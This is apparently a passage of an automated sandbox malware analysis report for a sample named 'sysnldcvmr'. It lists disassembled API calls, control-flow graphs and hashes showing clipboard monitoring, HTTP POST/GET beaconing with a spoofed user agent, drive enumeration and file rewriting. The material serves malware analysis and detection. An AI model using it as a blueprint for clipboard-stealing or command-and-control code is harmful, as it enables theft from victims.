                                                                                                                                                                                                                                                    control_flow_graph 520 401920-401947 GetTickCount WaitForSingleObject 521 401ac9-401acf 520->521 522 40194d-401964 WSAWaitForMultipleEvents 520->522 523 4019f0-401a03 GetTickCount 522->523 524 40196a-401981 WSAEnumNetworkEvents 522->524 525 401a43-401a4c GetTickCount 523->525 526 401a05-401a14 EnterCriticalSection 523->526 524->523 527 401983-401988 524->527 528 401ab5-401ac3 WaitForSingleObject 525->528 529 401a4e-401a5d EnterCriticalSection 525->529 530 401a16-401a1d 526->530 531 401a3a-401a41 LeaveCriticalSection 526->531 527->523 532 40198a-401990 527->532 528->521 528->522 533 401aa1-401ab1 LeaveCriticalSection GetTickCount 529->533 534 401a5f-401a77 InterlockedExchangeAdd call 40d4a0 529->534 535 401a35 call 401820 530->535 536 401a1f-401a27 530->536 531->528 532->523 537 401992-4019b1 accept 532->537 533->528 545 401a97-401a9f 534->545 546 401a79-401a82 534->546 535->531 536->530 539 401a29-401a30 LeaveCriticalSection 536->539 537->523 541 4019b3-4019c2 call 4022c0 537->541 539->528 541->523 547 4019c4-4019df call 401740 541->547 545->533 545->534 546->545 548 401a84-401a8d call 40ab40 546->548 547->523 553 4019e1-4019e7 547->553 548->545 553->523 554 4019e9-4019eb call 401cf0 553->554 554->523
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                                                                                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                                                                                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                                                                                                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                                                                                                                                    • API String ID: 3345448188-3762367603
                                                                                                                                                                                                                                                    • Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                                                                                                                                                                                                    • Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040E518
                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
                                                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E701
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E70E
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E71B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                                                                                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                                                                                                                                    • API String ID: 2761394606-2217117414
                                                                                                                                                                                                                                                    • Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                                                                                                                                                                                                    • Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                                                                                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                                                                                                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
                                                                                                                                                                                                                                                    • String ID: PCOI$ilci$.ou
                                                                                                                                                                                                                                                    • API String ID: 2403999931-3537421359
                                                                                                                                                                                                                                                    • Opcode ID: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                                                                                                                                                                                                    • Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 611 405970-405992 GetWindowLongW 612 405994-40599b 611->612 613 4059b6-4059bd 611->613 616 4059a1-4059a5 612->616 617 405a27-405a38 IsClipboardFormatAvailable 612->617 614 4059e6-4059ec 613->614 615 4059bf 613->615 619 405a06-405a0a 614->619 620 4059ee-405a04 SetWindowLongW 614->620 618 405ba4-405bbd DefWindowProcA 615->618 623 4059c4-4059e1 SetClipboardViewer SetWindowLongW 616->623 624 4059a7-4059ab 616->624 621 405a43-405a4d IsClipboardFormatAvailable 617->621 622 405a3a-405a41 617->622 625 405a22 619->625 626 405a0c-405a1c SendMessageA 619->626 620->625 628 405a58-405a62 IsClipboardFormatAvailable 621->628 629 405a4f-405a56 621->629 627 405a6b-405a6f 622->627 623->618 630 4059b1 624->630 631 405b5d-405b9e RegisterRawInputDevices ChangeClipboardChain 624->631 625->618 626->625 633 405a75-405a7f OpenClipboard 627->633 634 405b3f-405b43 627->634 628->627 632 405a64 628->632 629->627 630->618 631->618 632->627 633->634 637 405a85-405a96 GetClipboardData 633->637 635 405b45-405b55 SendMessageA 634->635 636 405b5b 634->636 635->636 636->618 638 405a98 637->638 639 405a9d-405aae GlobalLock 637->639 638->618 640 405ab0 639->640 641 405ab5-405ac6 639->641 640->618 642 405ac8-405acc 641->642 643 405ae9-405afc call 405690 641->643 644 405afe-405b0e call 4057b0 642->644 645 405ace-405ad2 642->645 651 405b11-405b25 GlobalUnlock CloseClipboard 643->651 644->651 647 405ad4 645->647 648 405ad6-405ae7 call 405570 645->648 647->651 648->651 651->634 654 405b27-405b3c call 404970 call 40a1b0 651->654 654->634
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040597C
                                                                                                                                                                                                                                                    • SetClipboardViewer.USER32(?), ref: 004059C8
                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405A77
                                                                                                                                                                                                                                                    • GetClipboardData.USER32(00000000), ref: 00405A89
                                                                                                                                                                                                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
                                                                                                                                                                                                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405B9E
                                                                                                                                                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3549449529-0
                                                                                                                                                                                                                                                    • Opcode ID: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                                                                                                                                                                                                    • Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 350a456a18ca66a485c2eebe1f768ad2515d325cb078b6b0c19f9934b7d85170
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00405898
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 004058C4
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004058CA
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004058D3
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004058E6
                                                                                                                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 004058F3
                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
                                                                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00405945
                                                                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 0040594F
                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 00405961
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                                                                                    • String ID: %x%X$0
                                                                                                                                                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                                                                                                                                                    • Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                                                                                                                                                                                                    • Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 669 40dbc0-40dc5b memset InternetCrackUrlA InternetOpenA 670 40dc61-40dc94 InternetConnectA 669->670 671 40ddd7-40dde0 669->671 672 40ddca-40ddd1 InternetCloseHandle 670->672 673 40dc9a-40dcca HttpOpenRequestA 670->673 672->671 674 40dcd0-40dce7 HttpSendRequestA 673->674 675 40ddbd-40ddc4 InternetCloseHandle 673->675 676 40ddb0-40ddb7 InternetCloseHandle 674->676 677 40dced-40dcf1 674->677 675->672 676->675 678 40dda6 677->678 679 40dcf7 677->679 678->676 680 40dd01-40dd08 679->680 681 40dd99-40dda4 680->681 682 40dd0e-40dd30 InternetReadFile 680->682 681->676 683 40dd32-40dd39 682->683 684 40dd3b 682->684 683->684 685 40dd3d-40dd94 call 409fe0 memcpy 683->685 684->681 685->680
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040DBE8
                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                                                                                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDC4
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DDD1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                                                                                                                                                                                                                                    • String ID: <$GET
                                                                                                                                                                                                                                                    • API String ID: 1205665004-427699995
                                                                                                                                                                                                                                                    • Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                                                                                                                                                                                                    • Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00406BCE
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00415E58,00000104), ref: 00406BE0
                                                                                                                                                                                                                                                      • Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                                                                                                                                                                                                      • Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                                                                                                                                                                                                      • Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 00406D4A
                                                                                                                                                                                                                                                      • Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                                                                                                                                                                                                      • Part of subcall function 004063A0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                                                                                                                                                                                                      • Part of subcall function 004063A0: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                                                                                                                                                                                                      • Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 00406D3D
                                                                                                                                                                                                                                                      • Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
                                                                                                                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
                                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406CC2
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406CE2
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406D05
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                                                                                    • String ID: (%dGB)$%s%s$Unnamed volume
                                                                                                                                                                                                                                                    • API String ID: 1650488544-2117135753
                                                                                                                                                                                                                                                    • Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                                                                                                                                                                                                    • Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 709 40e7c0-40e7ff CreateFileW 710 40e805-40e820 CreateFileMappingW 709->710 711 40e91a-40e91e 709->711 712 40e910-40e913 710->712 713 40e826-40e83f MapViewOfFile 710->713 714 40e920-40e940 CreateFileW 711->714 715 40e974-40e97a 711->715 712->711 716 40e845-40e85b GetFileSize 713->716 717 40e906-40e909 713->717 718 40e942-40e961 WriteFile 714->718 719 40e968-40e971 call 40a1b0 714->719 720 40e861-40e874 call 40c7f0 716->720 721 40e8fc-40e900 UnmapViewOfFile 716->721 717->712 718->719 719->715 720->721 726 40e87a-40e889 720->726 721->717 726->721 727 40e88b-40e8ba call 40c190 726->727 727->721 730 40e8bc-40e8e7 call 40a4e0 memcmp 727->730 730->721 733 40e8e9-40e8f5 call 40a1b0 730->733 733->721
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
                                                                                                                                                                                                                                                    • memcmp.NTDLL ref: 0040E8DD
                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E90A
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E914
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E962
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 3902698870-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                                                                                                                                                                                                    • Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00416478,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
